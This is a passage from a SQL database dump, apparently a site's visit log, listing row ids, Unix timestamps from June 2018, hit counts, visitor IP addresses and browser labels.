r'),(254824,1528210677,1,1,0,0,'54.36.149.80','other'),(254825,1528210741,1,1,0,0,'178.54.66.21','firefox'),(254826,1528210788,1,1,0,0,'141.8.142.74','other'),(254827,1528210810,1,1,0,0,'54.36.148.33','other'),(254828,1528210836,1,1,0,0,'54.36.148.200','other'),(254829,1528210868,2,2,0,0,'54.36.148.136','other'),(254830,1528211036,1,1,0,0,'185.177.191.100','chrome'),(254831,1528211126,1,1,0,0,'216.244.66.241','other'),(254832,1528211140,1,1,0,0,'212.129.3.60','chrome'),(254833,1528211266,1,1,0,0,'54.36.148.37','other'),(254834,1528211274,1,1,0,0,'54.36.148.216','other'),(254835,1528211334,1,1,0,0,'54.36.149.16','other'),(254836,1528211440,1,1,0,0,'54.36.148.241','other'),(254837,1528211472,1,1,0,0,'91.196.178.84','firefox'),(254838,1528211709,1,1,0,0,'62.205.134.182','other'),(254839,1528211737,1,1,0,0,'54.36.148.192','other'),(254840,1528211800,3,3,0,0,'95.67.80.108','chrome'),(254841,1528211813,1,1,0,0,'54.36.148.215','other'),(254842,1528211823,2,0,2,0,'66.249.64.30',''),(254843,1528211983,1,1,0,0,'54.36.148.165','other'),(254844,1528212011,1,1,0,0,'54.36.149.93','other'),(254845,1528212017,1,1,0,0,'54.36.148.44','other'),(254846,1528212274,1,1,0,0,'188.230.43.254','other'),(254847,1528212793,2,2,0,0,'95.67.80.108','chrome'),(254848,1528213024,1,1,0,0,'54.36.148.126','other'),(254849,1528213032,1,1,0,0,'54.36.148.144','other'),(254850,1528213178,1,1,0,0,'54.36.148.46','other'),(254851,1528213220,1,1,0,0,'54.36.149.28','other'),(254852,1528213347,2,2,0,0,'216.244.66.241','other'),(254853,1528213416,1,1,0,0,'54.36.149.22','other'),(254854,1528213856,3,3,0,0,'95.67.80.108','chrome'),(254855,1528213965,1,1,0,0,'54.36.149.106','other'),(254856,1528213976,1,1,0,0,'54.36.149.68','other'),(254857,1528213983,1,1,0,0,'54.36.148.219','other'),(254858,1528214068,1,1,0,0,'54.36.148.245','other'),(254859,1528214134,1,1,0,0,'54.36.148.14','other'),(254860,1528214198,2,2,0,0,'141.8.142.74','other'),(254861,1528214213,1,1,0,0,'54.36.149.64','other'),(254862,1528214239,1,1,0,0,'54.36.148.187','other'),(254863,1528214361,1,1,0,0,'54.36.148.100','other'),(254864,1528214392,1,1,0,0,'188.230.43.254','other'),(254865,1528214583,1,1,0,0,'54.36.149.41','other'),(254866,1528214875,1,1,0,0,'54.36.148.48','other'),(254867,1528214977,1,1,0,0,'192.166.219.136','other'),(254868,1528215094,1,1,0,0,'54.36.148.145','other'),(254869,1528215149,1,1,0,0,'54.36.148.90','other'),(254870,1528215212,1,1,0,0,'54.36.148.180','other'),(254871,1528215258,1,1,0,0,'54.36.148.77','other'),(254872,1528215268,1,1,0,0,'54.36.148.152','other'),(254873,1528215312,1,1,0,0,'62.205.134.182','other'),(254874,1528215371,1,1,0,0,'141.8.142.74','other'),(254875,1528215483,1,1,0,0,'54.36.148.186','other'),(254876,1528215662,1,1,0,0,'8.29.198.27','other'),(254877,1528215721,1,1,0,0,'54.36.148.46','other'),(254878,1528215923,1,1,0,0,'54.36.148.127','other'),(254879,1528216103,1,1,0,0,'46.4.60.249','other'),(254880,1528216132,1,1,0,0,'54.36.149.12','other'),(254881,1528216187,1,1,0,0,'180.76.15.13','other'),(254882,1528216413,1,1,0,0,'54.36.149.67','other'),(254883,1528216463,1,1,0,0,'54.36.148.182','other'),(254884,1528216488,1,1,0,0,'54.36.149.88','other'),(254885,1528216693,1,1,0,0,'54.36.149.5','other'),(254886,1528216789,1,1,0,0,'188.230.43.254','other'),(254887,1528217040,1,1,0,0,'54.36.148.188','other'),(254888,1528217284,1,1,0,0,'40.77.167.80','other'),(254889,1528217403,1,1,0,0,'54.36.149.83','other'),(254890,1528217608,1,1,0,0,'54.36.148.106','other'),(254891,1528217736,1,1,0,0,'54.36.149.88','other'),(254892,1528217772,1,1,0,0,'54.36.148.249','other'),(254893,1528218037,1,1,0,0,'54.36.148.33','other'),(254894,1528218128,2,2,0,0,'94.178.147.96','chrome'),(254895,1528218169,1,1,0,0,'107.167.117.7','other'),(254896,1528218298,1,1,0,0,'54.36.148.244','other'),(254897,1528218458,1,1,0,0,'141.8.142.74','other'),(254898,1528218503,1,1,0,0,'54.36.148.20','other'),(254899,1528218550,1,0,1,0,'66.249.64.30',''),(254900,1528218590,1,1,0,0,'54.36.149.42','other'),(254901,1528218706,1,1,0,0,'54.36.148.213','other'),(254902,1528218910,1,1,0,0,'62.205.134.182','other'),(254903,1528219035,1,1,0,0,'54.36.148.165','other'),(254904,1528219193,1,1,0,0,'188.230.43.254','other'),(254905,1528219287,1,1,0,0,'95.163.255.99','other'),(254906,1528219340,2,2,0,0,'216.244.66.241','other'),(254907,1528219416,2,2,0,0,'54.36.148.221','other'),(254908,1528219592,1,1,0,0,'95.67.80.108','chrome'),(254909,1528219617,1,1,0,0,'54.36.149.82','other'),(254910,1528219888,1,1,0,0,'54.36.149.44','other'),(254911,1528219967,1,0,1,0,'66.249.64.28',''),(254912,1528220108,1,1,0,0,'54.36.149.79','other'),(254913,1528220113,1,1,0,0,'54.36.148.176','other'),(254914,1528220339,1,1,0,0,'54.36.148.144','other'),(254915,1528220406,1,1,0,0,'54.36.149.87','other'),(254916,1528220737,5,5,0,0,'95.67.80.108','chrome'),(254917,1528220738,1,1,0,0,'54.36.148.93','other'),(254918,1528220774,1,1,0,0,'54.36.148.130','other'),(254919,1528220820,1,1,0,0,'54.36.149.8','other'),(254920,1528220858,1,1,0,0,'8.29.198.26','other'),(254921,1528220951,1,1,0,0,'54.36.149.28','other'),(254922,1528220973,1,1,0,0,'95.163.255.92','other'),(254923,1528221315,1,1,0,0,'54.36.148.219','other'),(254924,1528221366,1,1,0,0,'54.36.149.93','other'),(254925,1528221573,1,1,0,0,'207.46.13.143','other'),(254926,1528221579,1,1,0,0,'54.36.148.107','other'),(254927,1528221723,1,1,0,0,'54.36.148.149','other'),(254928,1528222054,1,1,0,0,'54.36.148.216','other'),(254929,1528222106,2,0,2,0,'66.249.64.29',''),(254930,1528222216,1,1,0,0,'54.36.148.190','other'),(254931,1528222234,1,1,0,0,'207.46.13.126','other'),(254932,1528222400,1,1,0,0,'54.36.148.117','other'),(254933,1528222510,1,1,0,0,'62.205.134.182','other'),(254934,1528222651,1,1,0,0,'141.8.142.74','other'),(254935,1528222866,1,1,0,0,'54.36.148.88','other'),(254936,1528222942,1,1,0,0,'54.36.148.60','other'),(254937,1528223061,3,3,0,0,'95.67.80.108','chrome'),(254938,1528223064,1,1,0,0,'37.9.113.110','other'),(254939,1528223298,1,1,0,0,'54.36.148.48','other'),(254940,1528223564,1,1,0,0,'54.36.148.249','other'),(254941,1528223648,1,1,0,0,'54.36.148.76','other'),(254942,1528223929,1,1,0,0,'54.36.148.161','other'),(254943,1528223976,1,1,0,0,'95.163.255.98','other'),(254944,1528224048,1,1,0,0,'54.36.148.126','other'),(254945,1528224060,1,1,0,0,'46.175.241.63','chrome'),(254946,1528224161,1,1,0,0,'40.77.167.44','other'),(254947,1528224193,1,1,0,0,'54.36.149.94','other'),(254948,1528224294,1,1,0,0,'54.36.148.245','other'),(254949,1528224310,1,1,0,0,'54.36.148.118','other'),(254950,1528224497,2,2,0,0,'95.67.80.108','chrome'),(254951,1528224621,1,1,0,0,'54.36.149.95','other'),(254952,1528224751,1,1,0,0,'54.36.148.213','other'),(254953,1528224853,1,1,0,0,'54.36.149.86','other'),(254954,1528224876,1,1,0,0,'54.36.148.208','other'),(254955,1528224984,1,1,0,0,'54.36.148.54','other'),(254956,1528225050,1,1,0,0,'54.36.148.249','other'),(254957,1528225267,1,1,0,0,'54.36.148.13','other'),(254958,1528225297,1,1,0,0,'54.172.136.12','other'),(254959,1528225347,1,1,0,0,'54.36.148.136','other'),(254960,1528225415,1,1,0,0,'54.36.148.31','other'),(254961,1528225487,1,1,0,0,'54.36.148.214','other'),(254962,1528225570,1,1,0,0,'95.67.80.108','chrome'),(254963,1528225613,1,1,0,0,'54.36.149.85','other'),(254964,1528225620,1,1,0,0,'54.36.148.194','other'),(254965,1528225890,1,1,0,0,'141.8.142.74','other'),(254966,1528226084,1,1,0,0,'54.36.148.247','other'),(254967,1528226110,1,1,0,0,'62.205.134.182','other'),(254968,1528226142,1,1,0,0,'54.36.148.98','other'),(254969,1528226155,1,1,0,0,'92.113.156.65','chrome'),(254970,1528226231,1,1,0,0,'54.172.136.12','other'),(254971,1528226402,2,2,0,0,'91.196.178.189','chrome'),(254972,1528226446,1,0,1,0,'66.249.64.30',''),(254973,1528226503,1,1,0,0,'54.36.149.14','other'),(254974,1528226504,1,1,0,0,'8.29.198.27','other'),(254975,1528226521,25,25,0,0,'142.4.200.37','other'),(254976,1528226638,2,2,0,0,'95.67.80.108','chrome'),(254977,1528226751,1,1,0,0,'54.36.148.15','other'),(254978,1528226775,1,1,0,0,'54.36.148.165','other'),(254979,1528226867,1,1,0,0,'216.244.66.241','other'),(254980,1528226992,1,1,0,0,'54.36.149.40','other'),(254981,1528227122,1,1,0,0,'54.36.149.57','other'),(254982,1528227149,1,1,0,0,'54.36.148.136','other'),(254983,1528227175,1,1,0,0,'54.172.136.12','other'),(254984,1528227202,1,1,0,0,'54.36.148.179','other'),(254985,1528227339,1,1,0,0,'54.36.148.58','other'),(254986,1528227413,1,1,0,0,'54.36.148.160','other'),(254987,1528227499,1,1,0,0,'77.111.244.35','chrome'),(254988,1528227538,1,1,0,0,'54.36.148.46','other'),(254989,1528227579,1,1,0,0,'54.36.148.22','other'),(254990,1528227681,1,1,0,0,'54.36.148.215','other'),(254991,1528227946,1,1,0,0,'54.36.149.36','other'),(254992,1528227984,1,1,0,0,'54.36.148.35','other'),(254993,1528228084,1,1,0,0,'54.172.136.12','other'),(254994,1528228113,1,1,0,0,'54.36.148.69','other'),(254995,1528228172,1,0,1,0,'66.249.64.28',''),(254996,1528228182,1,1,0,0,'54.36.149.8','other'),(254997,1528228214,4,4,0,0,'95.67.80.108','chrome'),(254998,1528228312,1,0,1,0,'66.249.64.29',''),(254999,1528228432,1,1,0,0,'54.36.148.57','other'),(255000,1528228437,1,1,0,0,'54.36.148.109','other'),(255001,1528228498,1,1,0,0,'37.9.113.182','other'),(255002,1528228854,1,1,0,0,'54.36.148.132','other'),(255003,1528228895,1,1,0,0,'54.36.148.80','other'),(255004,1528229092,1,1,0,0,'54.172.136.12','other'),(255005,1528229240,1,1,0,0,'54.36.149.48','other'),(255006,1528229423,1,1,0,0,'54.36.149.38','other'),(255007,1528229463,1,1,0,0,'54.36.149.98','other'),(255008,1528229702,1,0,1,0,'66.249.64.28',''),(255009,1528229708,1,1,0,0,'62.205.134.182','other'),(255010,1528230033,1,1,0,0,'54.172.136.12','other'),(255011,1528230068,2,2,0,0,'95.67.80.108','chrome'),(255012,1528230317,1,1,0,0,'54.36.148.98','other'),(255013,1528230694,3,0,3,0,'66.249.64.29',''),(255014,1528230768,1,0,1,0,'66.249.64.30',''),(255015,1528230815,1,1,0,0,'54.36.148.59','other'),(255016,1528230963,1,1,0,0,'54.172.136.12','other'),(255017,1528230992,1,1,0,0,'54.36.148.81','other'),(255018,1528231210,1,1,0,0,'95.67.80.108','chrome'),(255019,1528231262,1,1,0,0,'54.36.148.174','other'),(255020,1528231320,1,1,0,0,'54.36.148.201','other'),(255021,1528231707,1,1,0,0,'8.29.198.25','other'),(255022,1528231898,1,1,0,0,'54.172.136.12','other'),(255023,1528232122,1,1,0,0,'54.36.148.96','other'),(255024,1528232424,1,1,0,0,'54.36.149.22','other'),(255025,1528232518,1,1,0,0,'216.244.66.241','other'),(255026,1528232642,1,1,0,0,'141.8.142.74','other'),(255027,1528232778,1,1,0,0,'54.36.149.59','other'),(255028,1528232805,1,1,0,0,'54.172.136.12','other'),(255029,1528233129,1,1,0,0,'54.36.148.17','other'),(255030,1528233308,1,1,0,0,'62.205.134.182','other'),(255031,1528233471,1,1,0,0,'54.36.148.93','other'),(255032,1528233527,1,1,0,0,'54.36.148.75','other'),(255033,1528233712,1,1,0,0,'54.172.136.12','other'),(255034,1528233720,1,1,0,0,'216.244.66.241','other'),(255035,1528233828,1,1,0,0,'54.36.148.239','other'),(255036,1528233848,1,1,0,0,'54.36.148.235','other'),(255037,1528234010,1,1,0,0,'54.36.149.76','other'),(255038,1528234294,1,1,0,0,'54.36.148.151','other'),(255039,1528234621,1,1,0,0,'54.172.136.12','other'),(255040,1528234629,1,1,0,0,'54.36.148.72','other'),(255041,1528234637,1,1,0,0,'54.36.148.117','other'),(255042,1528234692,1,1,0,0,'54.36.148.84','other'),(255043,1528235032,1,1,0,0,'54.36.148.112','other'),(255044,1528235075,1,1,0,0,'216.244.66.241','other'),(255045,1528235126,1,0,1,0,'66.249.64.29',''),(255046,1528235410,3,3,0,0,'37.57.218.243','other'),(255047,1528235506,1,0,1,0,'66.249.64.28',''),(255048,1528235540,1,1,0,0,'54.172.136.12','other'),(255049,1528235615,1,1,0,0,'95.24.90.35','chrome'),(255050,1528235865,1,1,0,0,'54.36.149.46','other'),(255051,1528235881,1,0,1,0,'66.249.70.25',''),(255052,1528235944,1,1,0,0,'54.36.148.66','other'),(255053,1528236146,1,1,0,0,'54.36.148.128','other'),(255054,1528236330,1,1,0,0,'54.36.148.252','other'),(255055,1528236380,2,2,0,0,'216.244.66.241','other'),(255056,1528236467,1,1,0,0,'54.172.136.12','other'),(255057,1528236528,1,1,0,0,'54.36.148.106','other'),(255058,1528236823,1,1,0,0,'54.36.149.53','other'),(255059,1528236908,1,1,0,0,'62.205.134.182','other'),(255060,1528237073,1,1,0,0,'54.36.148.55','other'),(255061,1528237288,1,1,0,0,'54.36.148.125','other'),(255062,1528237335,1,1,0,0,'8.29.198.26','other'),(255063,1528237390,1,1,0,0,'54.172.136.12','other'),(255064,1528237426,1,1,0,0,'54.36.148.143','other'),(255065,1528237462,1,1,0,0,'54.36.148.167','other'),(255066,1528237728,1,0,1,0,'66.249.64.30',''),(255067,1528237847,1,1,0,0,'54.36.149.7','other'),(255068,1528237950,1,1,0,0,'54.36.149.101','other'),(255069,1528238213,2,0,2,0,'66.249.64.29',''),(255070,1528238292,1,1,0,0,'54.36.149.106','other'),(255071,1528238293,1,1,0,0,'54.172.136.12','other'),(255072,1528238584,1,1,0,0,'54.36.148.72','other'),(255073,1528238648,1,1,0,0,'54.36.148.25','other'),(255074,1528238748,1,1,0,0,'54.36.149.21','other'),(255075,1528238764,1,1,0,0,'54.36.149.38','other'),(255076,1528238844,1,1,0,0,'95.216.5.212','other'),(255077,1528238993,1,1,0,0,'54.36.149.3','other'),(255078,1528239059,1,1,0,0,'54.36.149.37','other'),(255079,1528239105,1,1,0,0,'66.249.70.25','chrome'),(255080,1528239111,1,1,0,0,'54.36.148.95','other'),(255081,1528239212,1,1,0,0,'54.172.136.12','other'),(255082,1528239298,1,1,0,0,'207.46.13.20','other'),(255083,1528239475,1,1,0,0,'54.36.149.100','other'),(255084,1528239505,1,1,0,0,'54.36.148.48','other'),(255085,1528239698,1,0,1,0,'66.249.64.29',''),(255086,1528239791,1,1,0,0,'54.36.149.94','other'),(255087,1528239807,1,1,0,0,'141.8.142.74','other'),(255088,1528239813,2,2,0,0,'54.36.148.190','other'),(255089,1528239957,1,1,0,0,'178.154.171.88','other'),(255090,1528239970,1,1,0,0,'54.36.149.25','other'),(255091,1528240008,1,1,0,0,'54.36.148.127','other'),(255092,1528240012,1,1,0,0,'54.36.148.239','other'),(255093,1528240040,1,1,0,0,'54.36.148.161','other'),(255094,1528240139,1,1,0,0,'54.172.136.12','other'),(255095,1528240154,1,1,0,0,'54.36.148.84','other'),(255096,1528240357,1,1,0,0,'54.36.148.30','other'),(255097,1528240359,1,1,0,0,'54.36.148.172','other'),(255098,1528240460,1,1,0,0,'54.36.149.10','other'),(255099,1528240493,1,1,0,0,'54.36.149.1','other'),(255100,1528240510,1,1,0,0,'62.205.134.182','other'),(255101,1528240639,1,1,0,0,'54.36.148.75','other'),(255102,1528240730,1,1,0,0,'54.36.148.24','other'),(255103,1528240808,1,1,0,0,'54.36.148.28','other'),(255104,1528240849,1,1,0,0,'54.36.148.143','other'),(255105,1528240872,1,1,0,0,'54.36.148.134','other'),(255106,1528241048,1,1,0,0,'54.172.136.12','other'),(255107,1528241227,1,1,0,0,'54.36.149.49','other'),(255108,1528241246,1,1,0,0,'54.36.149.38','other'),(255109,1528241386,1,1,0,0,'54.36.148.173','other'),(255110,1528241535,1,1,0,0,'54.36.148.178','other'),(255111,1528241565,1,1,0,0,'54.36.148.93','other'),(255112,1528241591,1,1,0,0,'54.36.148.186','other'),(255113,1528241611,2,2,0,0,'54.36.148.117','other'),(255114,1528241696,1,0,1,0,'66.249.64.29',''),(255115,1528241872,1,0,1,0,'66.249.70.25',''),(255116,1528241885,1,1,0,0,'54.36.148.172','other'),(255117,1528241924,1,1,0,0,'54.36.148.56','other'),(255118,1528241952,1,1,0,0,'54.172.136.12','other'),(255119,1528241970,1,1,0,0,'54.36.148.68','other'),(255120,1528241993,1,1,0,0,'54.36.149.13','other'),(255121,1528242271,1,1,0,0,'54.36.148.70','other'),(255122,1528242299,1,1,0,0,'54.36.148.79','other'),(255123,1528242459,1,1,0,0,'54.36.148.205','other'),(255124,1528242540,1,1,0,0,'8.29.198.26','other'),(255125,1528242657,1,1,0,0,'54.36.148.207','other'),(255126,1528242962,1,1,0,0,'54.172.136.12','other'),(255127,1528243036,1,1,0,0,'54.36.149.88','other'),(255128,1528243072,1,1,0,0,'54.36.149.18','other'),(255129,1528243114,1,1,0,0,'87.250.224.46','other'),(255130,1528243206,1,1,0,0,'95.163.255.97','other'),(255131,1528243316,1,1,0,0,'54.36.148.71','other'),(255132,1528243377,1,1,0,0,'54.36.148.80','other'),(255133,1528243694,1,1,0,0,'54.36.149.98','other'),(255134,1528243903,1,1,0,0,'54.36.148.243','other'),(255135,1528244006,1,1,0,0,'54.36.148.158','other'),(255136,1528244110,1,1,0,0,'62.205.134.182','other'),(255137,1528244137,1,1,0,0,'54.172.136.12','other'),(255138,1528244283,1,1,0,0,'54.36.149.25','other'),(255139,1528244429,1,1,0,0,'54.36.149.101','other'),(255140,1528244560,1,1,0,0,'54.36.149.53','other'),(255141,1528244948,1,1,0,0,'54.167.176.115','other'),(255142,1528245004,1,0,1,0,'66.249.64.30',''),(255143,1528245074,1,1,0,0,'54.172.136.12','other'),(255144,1528245164,1,1,0,0,'54.36.148.130','other'),(255145,1528245664,1,1,0,0,'54.36.149.69','other'),(255146,1528245753,1,1,0,0,'54.36.148.192','other'),(255147,1528245763,1,1,0,0,'54.36.148.20','other'),(255148,1528245852,1,1,0,0,'54.167.176.115','other'),(255149,1528245911,1,1,0,0,'54.36.149.59','other'),(255150,1528245948,1,1,0,0,'54.36.148.193','other'),(255151,1528246081,1,1,0,0,'54.36.149.11','other'),(255152,1528246092,1,1,0,0,'54.172.136.12','other'),(255153,1528246477,1,1,0,0,'54.36.148.164','other'),(255154,1528246742,1,1,0,0,'180.76.15.9','other'),(255155,1528246852,1,1,0,0,'54.36.148.212','other'),(255156,1528246942,1,0,1,0,'66.249.64.29',''),(255157,1528247061,1,1,0,0,'54.172.136.12','other'),(255158,1528247270,1,1,0,0,'54.36.148.249','other'),(255159,1528247368,1,1,0,0,'54.36.148.79','other'),(255160,1528247444,1,1,0,0,'54.36.148.177','other'),(255161,1528247487,1,1,0,0,'54.36.148.128','other'),(255162,1528247488,1,1,0,0,'54.36.149.95','other'),(255163,1528247523,1,1,0,0,'54.36.148.199','other'),(255164,1528247610,1,1,0,0,'54.36.148.190','other'),(255165,1528247709,1,1,0,0,'62.205.134.182','other'),(255166,1528248049,1,1,0,0,'54.172.136.12','other'),(255168,1528248166,1,1,0,0,'8.29.198.25','other'),(255169,1528248447,1,1,0,0,'54.36.148.90','other'),(255170,1528248560,1,0,1,0,'66.249.64.29',''),(255171,1528248742,1,1,0,0,'180.76.15.23','other'),(255172,1528248852,1,1,0,0,'54.36.148.58','other'),(255173,1528248880,1,1,0,0,'54.36.148.97','other'),(255174,1528249001,1,1,0,0,'54.172.136.12','other'),(255175,1528249057,1,1,0,0,'54.36.148.147','other'),(255176,1528249506,1,1,0,0,'54.36.149.88','other'),(255177,1528249603,1,1,0,0,'95.163.255.93','other'),(255178,1528249823,1,1,0,0,'54.36.148.208','other'),(255179,1528249920,1,1,0,0,'54.172.136.12','other'),(255180,1528250042,1,1,0,0,'54.36.148.54','other'),(255181,1528250120,1,1,0,0,'95.163.255.94','other'),(255182,1528250159,1,1,0,0,'54.36.148.218','other'),(255183,1528250256,1,1,0,0,'54.36.149.105','other'),(255184,1528250300,1,1,0,0,'95.163.255.95','other'),(255185,1528250832,1,1,0,0,'54.172.136.12','other'),(255186,1528251111,1,1,0,0,'54.36.148.38','other'),(255187,1528251150,1,1,0,0,'54.36.149.18','other'),(255188,1528251170,2,0,2,0,'66.249.66.157',''),(255189,1528251308,1,1,0,0,'62.205.134.182','other'),(255190,1528251315,1,1,0,0,'54.36.148.128','other'),(255191,1528251323,1,1,0,0,'54.36.148.179','other'),(255192,1528251334,1,1,0,0,'54.36.149.54','other'),(255193,1528251353,1,1,0,0,'54.36.149.62','other'),(255194,1528251447,1,1,0,0,'54.36.148.65','other'),(255195,1528251604,1,1,0,0,'54.36.148.218','other'),(255196,1528251658,1,1,0,0,'54.36.149.75','other'),(255197,1528251742,1,1,0,0,'54.36.149.85','other'),(255198,1528251778,1,1,0,0,'54.36.148.73','other'),(255199,1528251800,1,1,0,0,'54.172.136.12','other'),(255200,1528251969,1,1,0,0,'54.36.148.62','other'),(255201,1528251983,1,1,0,0,'95.221.128.114','chrome'),(255202,1528252535,1,1,0,0,'54.36.149.48','other'),(255203,1528252704,1,1,0,0,'54.172.136.12','other'),(255204,1528252733,1,1,0,0,'54.36.148.84','other'),(255205,1528252862,1,1,0,0,'54.36.148.16','other'),(255206,1528252922,1,1,0,0,'54.36.149.19','other'),(255207,1528253045,1,1,0,0,'54.36.148.242','other'),(255208,1528253128,1,1,0,0,'141.8.142.74','other'),(255209,1528253148,1,1,0,0,'54.36.148.221','other'),(255210,1528253291,1,1,0,0,'54.36.149.97','other'),(255211,1528253374,1,1,0,0,'8.29.198.27','other'),(255212,1528253439,1,1,0,0,'54.36.148.187','other'),(255213,1528253540,1,1,0,0,'54.36.148.66','other'),(255214,1528253614,1,1,0,0,'54.172.136.12','other'),(255215,1528253696,1,1,0,0,'54.36.149.78','other'),(255216,1528253843,1,1,0,0,'54.36.148.183','other'),(255217,1528253913,1,1,0,0,'54.36.148.103','other'),(255218,1528253921,1,1,0,0,'54.36.149.6','other'),(255219,1528253957,1,1,0,0,'54.36.148.140','other'),(255220,1528254275,1,1,0,0,'40.77.167.35','other'),(255221,1528254300,1,1,0,0,'54.36.149.30','other'),(255222,1528254392,1,1,0,0,'40.77.167.88','other'),(255223,1528254399,1,1,0,0,'54.36.148.68','other'),(255224,1528254460,1,1,0,0,'54.36.148.79','other'),(255225,1528254464,1,1,0,0,'54.36.148.137','other'),(255226,1528254547,1,1,0,0,'54.172.136.12','other'),(255227,1528254892,1,0,1,0,'66.249.66.156',''),(255228,1528254908,1,1,0,0,'62.205.134.182','other'),(255229,1528254913,1,1,0,0,'54.36.148.126','other'),(255230,1528254964,1,1,0,0,'54.36.149.5','other'),(255231,1528255043,1,1,0,0,'54.36.149.50','other'),(255232,1528255066,1,1,0,0,'141.8.142.74','other'),(255233,1528255133,1,1,0,0,'54.36.148.113','other'),(255234,1528255170,1,1,0,0,'54.36.148.135','other'),(255235,1528255315,1,1,0,0,'178.154.171.88','other'),(255236,1528255554,1,1,0,0,'216.244.66.241','other'),(255237,1528255653,1,1,0,0,'54.36.149.71','other'),(255238,1528255930,1,1,0,0,'40.77.167.198','other'),(255239,1528256191,1,1,0,0,'54.36.148.95','other'),(255240,1528256302,1,1,0,0,'54.36.148.75','other'),(255241,1528256417,1,1,0,0,'54.36.148.214','other'),(255242,1528256629,1,1,0,0,'54.172.136.12','other'),(255243,1528256795,1,1,0,0,'54.36.148.58','other'),(255244,1528256907,1,1,0,0,'54.36.148.218','other'),(255245,1528257234,1,1,0,0,'54.36.148.148','other'),(255246,1528257525,1,1,0,0,'54.36.149.11','other'),(255247,1528257596,1,1,0,0,'54.36.148.197','other'),(255248,1528257959,1,1,0,0,'54.172.136.12','other'),(255249,1528258211,1,1,0,0,'54.36.148.194','other'),(255250,1528258509,1,1,0,0,'62.205.134.182','other'),(255251,1528258630,1,1,0,0,'54.36.149.67','other'),(255252,1528258769,1,1,0,0,'54.36.148.182','other'),(255253,1528259000,1,1,0,0,'8.29.198.26','other'),(255254,1528259254,1,1,0,0,'54.36.149.62','other'),(255255,1528259353,1,1,0,0,'54.36.148.38','other'),(255256,1528259467,1,1,0,0,'54.36.148.11','other'),(255257,1528259470,8,8,0,0,'173.208.206.50','other'),(255258,1528259492,1,1,0,0,'54.36.148.219','other'),(255259,1528259567,1,1,0,0,'54.36.149.24','other'),(255260,1528259573,1,1,0,0,'91.196.177.46','chrome'),(255261,1528259654,1,1,0,0,'54.36.148.50','other'),(255262,1528259787,1,1,0,0,'157.55.39.126','other'),(255263,1528259867,1,1,0,0,'54.36.148.41','other'),(255264,1528259879,1,0,1,0,'66.249.66.156',''),(255265,1528259985,1,1,0,0,'54.36.149.60','other'),(255266,1528259989,1,1,0,0,'54.36.148.25','other'),(255267,1528260169,1,0,1,0,'66.249.66.157',''),(255268,1528260294,1,1,0,0,'54.36.148.150','other'),(255269,1528260562,1,1,0,0,'54.36.148.236','other'),(255270,1528260566,1,1,0,0,'54.36.148.149','other'),(255271,1528260662,1,1,0,0,'54.36.148.213','other'),(255272,1528260753,1,1,0,0,'54.36.149.66','other'),(255273,1528261000,1,1,0,0,'54.36.148.47','other'),(255274,1528261031,2,1,1,0,'66.249.66.156',''),(255275,1528261096,1,1,0,0,'54.36.148.186','other'),(255276,1528261214,1,1,0,0,'54.36.148.99','other'),(255277,1528261352,1,1,0,0,'54.36.148.137','other'),(255278,1528261456,1,1,0,0,'54.36.148.25','other'),(255279,1528261634,1,1,0,0,'54.36.148.44','other'),(255280,1528261693,1,1,0,0,'54.36.148.147','other'),(255281,1528261856,1,1,0,0,'54.36.149.54','other'),(255282,1528261866,1,1,0,0,'54.36.149.107','other'),(255283,1528261945,1,1,0,0,'54.36.148.200','other'),(255284,1528262109,1,1,0,0,'62.205.134.182','other'),(255285,1528262181,1,1,0,0,'54.36.148.226','other'),(255286,1528262183,2,2,0,0,'54.36.148.112','other'),(255287,1528262239,1,1,0,0,'54.36.148.117','other'),(255288,1528262410,1,1,0,0,'54.36.148.14','other'),(255289,1528262590,1,1,0,0,'54.36.148.103','other'),(255290,1528262663,1,1,0,0,'54.36.148.92','other'),(255291,1528262675,1,1,0,0,'54.36.148.252','other'),(255292,1528262713,1,1,0,0,'141.8.142.74','other'),(255293,1528262789,1,1,0,0,'193.106.30.99','firefox'),(255294,1528262954,1,1,0,0,'54.36.149.49','other'),(255295,1528263157,1,1,0,0,'92.112.157.229','chrome'),(255296,1528263357,1,1,0,0,'54.36.149.50','other'),(255297,1528263443,1,1,0,0,'54.36.148.229','other'),(255298,1528263474,1,1,0,0,'54.36.148.161','other'),(255299,1528263534,1,1,0,0,'216.244.66.241','other'),(255300,1528263787,1,1,0,0,'54.36.148.187','other'),(255301,1528263851,1,0,1,0,'66.249.66.76',''),(255302,1528263871,1,1,0,0,'54.36.149.94','other'),(255303,1528263924,2,0,2,0,'66.249.66.156',''),(255304,1528264006,1,1,0,0,'54.36.149.68','other'),(255305,1528264198,1,1,0,0,'8.29.198.25','other'),(255306,1528264659,1,1,0,0,'54.36.148.183','other'),(255307,1528264681,2,2,0,0,'91.196.178.85','chrome'),(255308,1528264963,1,1,0,0,'40.77.167.195','other'),(255309,1528265482,1,1,0,0,'54.36.148.148','other'),(255310,1528265492,1,1,0,0,'91.196.177.46','firefox'),(255311,1528265537,1,1,0,0,'54.36.148.203','other'),(255312,1528265661,1,1,0,0,'54.36.149.38','other'),(255313,1528265710,1,1,0,0,'62.205.134.182','other'),(255314,1528265843,1,1,0,0,'40.77.167.194','other'),(255315,1528265867,1,1,0,0,'54.36.149.41','other'),(255316,1528266019,1,1,0,0,'54.36.148.181','other'),(255317,1528266129,1,1,0,0,'54.36.148.95','other'),(255318,1528266280,1,1,0,0,'216.244.66.241','other'),(255319,1528266506,1,1,0,0,'54.36.149.43','other'),(255320,1528266530,1,1,0,0,'54.36.148.211','other'),(255321,1528266560,1,1,0,0,'54.36.148.113','other'),(255322,1528266859,1,0,1,0,'66.249.66.157',''),(255323,1528266922,1,1,0,0,'91.124.182.170','firefox'),(255324,1528267092,1,1,0,0,'54.36.149.5','other'),(255325,1528267163,1,1,0,0,'54.36.148.54','other'),(255326,1528267245,1,1,0,0,'54.36.148.240','other'),(255327,1528267335,1,1,0,0,'54.36.148.230','other'),(255328,1528267398,1,1,0,0,'54.36.148.74','other'),(255329,1528267799,1,1,0,0,'54.36.148.253','other'),(255330,1528268042,1,0,1,0,'66.249.66.155',''),(255331,1528268101,1,1,0,0,'54.36.149.42','other'),(255332,1528268111,1,1,0,0,'54.36.148.54','other'),(255333,1528268143,1,1,0,0,'193.19.152.14','chrome'),(255334,1528268232,1,1,0,0,'54.36.148.128','other'),(255335,1528268257,1,1,0,0,'82.207.113.242','chrome'),(255336,1528268275,1,1,0,0,'54.36.149.35','other'),(255337,1528268286,1,1,0,0,'54.36.149.78','other'),(255338,1528268300,1,1,0,0,'95.163.255.114','other'),(255339,1528268310,1,1,0,0,'95.163.255.105','other'),(255340,1528268329,1,0,1,0,'66.249.66.157',''),